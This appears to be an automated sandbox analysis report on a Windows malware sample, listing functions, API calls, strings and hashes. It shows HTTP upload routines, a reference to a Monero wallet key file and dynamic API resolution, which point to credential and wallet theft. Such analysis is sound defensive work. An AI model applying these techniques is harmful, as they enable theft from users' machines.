                              Function 001245C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 1245c0-124695 RtlAllocateHeap 781 1246a0-1246a6 764->781 782 12474f-1247a9 VirtualProtect 781->782 783 1246ac-12474a 781->783 783->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0012460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0012479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0012471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0012477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001246D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0012466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001245E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0012474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001246B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001245C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001245DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0012473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0012462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0012475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001246AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001245D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001246C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001245F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001246CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00124657
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 02b81af2dd20b63afe5b4a9134efabdd0d7bc8eb2f03a51254b02fe12f2417af
                              • Instruction ID: ad618cc9829bfd96f830e96c86ca86cf438e160298937c26cfbf473ac6a33245
                              • Opcode Fuzzy Hash: 02b81af2dd20b63afe5b4a9134efabdd0d7bc8eb2f03a51254b02fe12f2417af
                              • Instruction Fuzzy Hash: 04411460EEB6047BE728FFA498E2E9D77577F46F0CF987044AC2056293CBB0670145A2
                              Function 00124880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 124880-124942 call 13a7a0 call 1247b0 call 13a740 * 5 InternetOpenA StrCmpCA 816 124944 801->816 817 12494b-12494f 801->817 816->817 818 124955-124acd call 138b60 call 13a920 call 13a8a0 call 13a800 * 2 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a920 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a920 call 13a8a0 call 13a800 * 2 InternetConnectA 817->818 819 124ecb-124ef3 InternetCloseHandle call 13aad0 call 129ac0 817->819 818->819 905 124ad3-124ad7 818->905 829 124f32-124fa2 call 138990 * 2 call 13a7a0 call 13a800 * 8 819->829 830 124ef5-124f2d call 13a820 call 13a9b0 call 13a8a0 call 13a800 819->830 830->829 906 124ae5 905->906 907 124ad9-124ae3 905->907 908 124aef-124b22 HttpOpenRequestA 906->908 907->908 909 124b28-124e28 call 13a9b0 call 13a8a0 call 13a800 call 13a920 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a920 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a920 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a9b0 call 13a8a0 call 13a800 call 13a920 call 13a8a0 call 13a800 call 13a740 call 13a920 * 2 call 13a8a0 call 13a800 * 2 call 13aad0 lstrlen call 13aad0 * 2 lstrlen call 13aad0 HttpSendRequestA 908->909 910 124ebe-124ec5 InternetCloseHandle 908->910 1021 124e32-124e5c InternetReadFile 909->1021 910->819 1022 124e67-124eb9 InternetCloseHandle call 13a800 1021->1022 1023 124e5e-124e65 1021->1023 1022->910 1023->1022 1025 124e69-124ea7 call 13a9b0 call 13a8a0 call 13a800 1023->1025 1025->1021
                              APIs
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                                • Part of subcall function 001247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00124839
                                • Part of subcall function 001247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00124849
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00124915
                              • StrCmpCA.SHLWAPI(?,00FFE7D8), ref: 0012493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00124ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00140DDB,00000000,?,?,00000000,?,",00000000,?,00FFE8C8), ref: 00124DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00124E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00124E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00124E49
                              • InternetCloseHandle.WININET(00000000), ref: 00124EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00124EC5
                              • HttpOpenRequestA.WININET(00000000,00FFE898,?,00FFE338,00000000,00000000,00400100,00000000), ref: 00124B15
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                              • InternetCloseHandle.WININET(00000000), ref: 00124ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: 1af3f783657bf220134d198b1a39bc9746d7e8494d92742ca86022d27b9b1689
                              • Instruction ID: c767a06c44d1aca1c2d499cf6dbd1a979ddda38f64ee0ba0d002a7938dd03842
                              • Opcode Fuzzy Hash: 1af3f783657bf220134d198b1a39bc9746d7e8494d92742ca86022d27b9b1689
                              • Instruction Fuzzy Hash: 5412C972950118AADB15EBA0DCA2FEEB778BF64305F904199F14672091EF702F49CF62
                              Function 00137850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001211B7), ref: 00137880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00137887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0013789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 399c71933edbd140ba14f72431dc21d4cb126b15e8824d0692d6d83db27a3b33
                              • Instruction ID: b32a5893357df11d5925120855b5bdad4d0e6cfad7d19e167cb3c7a574d79a64
                              • Opcode Fuzzy Hash: 399c71933edbd140ba14f72431dc21d4cb126b15e8824d0692d6d83db27a3b33
                              • Instruction Fuzzy Hash: 21F04FB1944609ABCB14DF98DD49BAEFBBCEB09711F10425AFA05A3680C7B415048FA1
                              Function 00121160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 04f65bd14870b73c61d96c0072eddc4cd755a6bf99a42fe015abb25ed711ac8b
                              • Instruction ID: 9c286f9793f08283c77209842a7084fcab405134633cee892b3670e25b5aea26
                              • Opcode Fuzzy Hash: 04f65bd14870b73c61d96c0072eddc4cd755a6bf99a42fe015abb25ed711ac8b
                              • Instruction Fuzzy Hash: 78D05E7490030CDBCB00DFE0D84A6EDBB7CFB08312F000554DD0572340EB709491CAA6
                              Function 00139C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 139c10-139c1a 634 139c20-13a031 GetProcAddress * 43 633->634 635 13a036-13a0ca LoadLibraryA * 8 633->635 634->635 636 13a146-13a14d 635->636 637 13a0cc-13a141 GetProcAddress * 5 635->637 638 13a153-13a211 GetProcAddress * 8 636->638 639 13a216-13a21d 636->639 637->636 638->639 640 13a298-13a29f 639->640 641 13a21f-13a293 GetProcAddress * 5 639->641 642 13a337-13a33e 640->642 643 13a2a5-13a332 GetProcAddress * 6 640->643 641->640 644 13a344-13a41a GetProcAddress * 9 642->644 645 13a41f-13a426 642->645 643->642 644->645 646 13a4a2-13a4a9 645->646 647 13a428-13a49d GetProcAddress * 5 645->647 648 13a4ab-13a4d7 GetProcAddress * 2 646->648 649 13a4dc-13a4e3 646->649 647->646 648->649 650 13a515-13a51c 649->650 651 13a4e5-13a510 GetProcAddress * 2 649->651 652 13a612-13a619 650->652 653 13a522-13a60d GetProcAddress * 10 650->653 651->650 654 13a61b-13a678 GetProcAddress * 4 652->654 655 13a67d-13a684 652->655 653->652 654->655 656 13a686-13a699 GetProcAddress 655->656 657 13a69e-13a6a5 655->657 656->657 658 13a6a7-13a703 GetProcAddress * 4 657->658 659 13a708-13a709 657->659 658->659
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,00FE5B70), ref: 00139C2D
                              • GetProcAddress.KERNEL32(74DD0000,00FE5BB0), ref: 00139C45
                              • GetProcAddress.KERNEL32(74DD0000,00FF96B8), ref: 00139C5E
                              • GetProcAddress.KERNEL32(74DD0000,00FF9670), ref: 00139C76
                              • GetProcAddress.KERNEL32(74DD0000,00FF96D0), ref: 00139C8E
                              • GetProcAddress.KERNEL32(74DD0000,00FF96A0), ref: 00139CA7
                              • GetProcAddress.KERNEL32(74DD0000,00FEB900), ref: 00139CBF
                              • GetProcAddress.KERNEL32(74DD0000,00FFD4E8), ref: 00139CD7
                              • GetProcAddress.KERNEL32(74DD0000,00FFD470), ref: 00139CF0
                              • GetProcAddress.KERNEL32(74DD0000,00FFD548), ref: 00139D08
                              • GetProcAddress.KERNEL32(74DD0000,00FFD578), ref: 00139D20
                              • GetProcAddress.KERNEL32(74DD0000,00FE5C10), ref: 00139D39
                              • GetProcAddress.KERNEL32(74DD0000,00FE5C30), ref: 00139D51
                              • GetProcAddress.KERNEL32(74DD0000,00FE5C50), ref: 00139D69
                              • GetProcAddress.KERNEL32(74DD0000,00FE5CB0), ref: 00139D82
                              • GetProcAddress.KERNEL32(74DD0000,00FFD3F8), ref: 00139D9A
                              • GetProcAddress.KERNEL32(74DD0000,00FFD4B8), ref: 00139DB2
                              • GetProcAddress.KERNEL32(74DD0000,00FEB978), ref: 00139DCB
                              • GetProcAddress.KERNEL32(74DD0000,00FE5CD0), ref: 00139DE3
                              • GetProcAddress.KERNEL32(74DD0000,00FFD428), ref: 00139DFB
                              • GetProcAddress.KERNEL32(74DD0000,00FFD4D0), ref: 00139E14
                              • GetProcAddress.KERNEL32(74DD0000,00FFD590), ref: 00139E2C
                              • GetProcAddress.KERNEL32(74DD0000,00FFD4A0), ref: 00139E44
                              • GetProcAddress.KERNEL32(74DD0000,00FE5D30), ref: 00139E5D
                              • GetProcAddress.KERNEL32(74DD0000,00FFD488), ref: 00139E75
                              • GetProcAddress.KERNEL32(74DD0000,00FFD440), ref: 00139E8D
                              • GetProcAddress.KERNEL32(74DD0000,00FFD5A8), ref: 00139EA6
                              • GetProcAddress.KERNEL32(74DD0000,00FFD500), ref: 00139EBE
                              • GetProcAddress.KERNEL32(74DD0000,00FFD410), ref: 00139ED6
                              • GetProcAddress.KERNEL32(74DD0000,00FFD458), ref: 00139EEF
                              • GetProcAddress.KERNEL32(74DD0000,00FFD518), ref: 00139F07
                              • GetProcAddress.KERNEL32(74DD0000,00FFD530), ref: 00139F1F
                              • GetProcAddress.KERNEL32(74DD0000,00FFD560), ref: 00139F38
                              • GetProcAddress.KERNEL32(74DD0000,00FFA900), ref: 00139F50
                              • GetProcAddress.KERNEL32(74DD0000,00FFCDF8), ref: 00139F68
                              • GetProcAddress.KERNEL32(74DD0000,00FFD098), ref: 00139F81
                              • GetProcAddress.KERNEL32(74DD0000,00FE5D50), ref: 00139F99
                              • GetProcAddress.KERNEL32(74DD0000,00FFD050), ref: 00139FB1
                              • GetProcAddress.KERNEL32(74DD0000,00FE59F0), ref: 00139FCA
                              • GetProcAddress.KERNEL32(74DD0000,00FFD038), ref: 00139FE2
                              • GetProcAddress.KERNEL32(74DD0000,00FFCFD8), ref: 00139FFA
                              • GetProcAddress.KERNEL32(74DD0000,00FE5950), ref: 0013A013
                              • GetProcAddress.KERNEL32(74DD0000,00FE5A70), ref: 0013A02B
                              • LoadLibraryA.KERNEL32(00FFCE40,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A03D
                              • LoadLibraryA.KERNEL32(00FFD068,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A04E
                              • LoadLibraryA.KERNEL32(00FFD0E0,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A060
                              • LoadLibraryA.KERNEL32(00FFCF60,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A072
                              • LoadLibraryA.KERNEL32(00FFD080,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A083
                              • LoadLibraryA.KERNEL32(00FFCFF0,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A095
                              • LoadLibraryA.KERNEL32(00FFCE58,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A0A7
                              • LoadLibraryA.KERNEL32(00FFCE70,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A0B8
                              • GetProcAddress.KERNEL32(75290000,00FE57D0), ref: 0013A0DA
                              • GetProcAddress.KERNEL32(75290000,00FFCE88), ref: 0013A0F2
                              • GetProcAddress.KERNEL32(75290000,00FF9148), ref: 0013A10A
                              • GetProcAddress.KERNEL32(75290000,00FFCE10), ref: 0013A123
                              • GetProcAddress.KERNEL32(75290000,00FE56D0), ref: 0013A13B
                              • GetProcAddress.KERNEL32(6FC70000,00FEB9A0), ref: 0013A160
                              • GetProcAddress.KERNEL32(6FC70000,00FE5910), ref: 0013A179
                              • GetProcAddress.KERNEL32(6FC70000,00FEB6D0), ref: 0013A191
                              • GetProcAddress.KERNEL32(6FC70000,00FFCEA0), ref: 0013A1A9
                              • GetProcAddress.KERNEL32(6FC70000,00FFCF18), ref: 0013A1C2
                              • GetProcAddress.KERNEL32(6FC70000,00FE5A50), ref: 0013A1DA
                              • GetProcAddress.KERNEL32(6FC70000,00FE5930), ref: 0013A1F2
                              • GetProcAddress.KERNEL32(6FC70000,00FFCF78), ref: 0013A20B
                              • GetProcAddress.KERNEL32(752C0000,00FE5850), ref: 0013A22C
                              • GetProcAddress.KERNEL32(752C0000,00FE58D0), ref: 0013A244
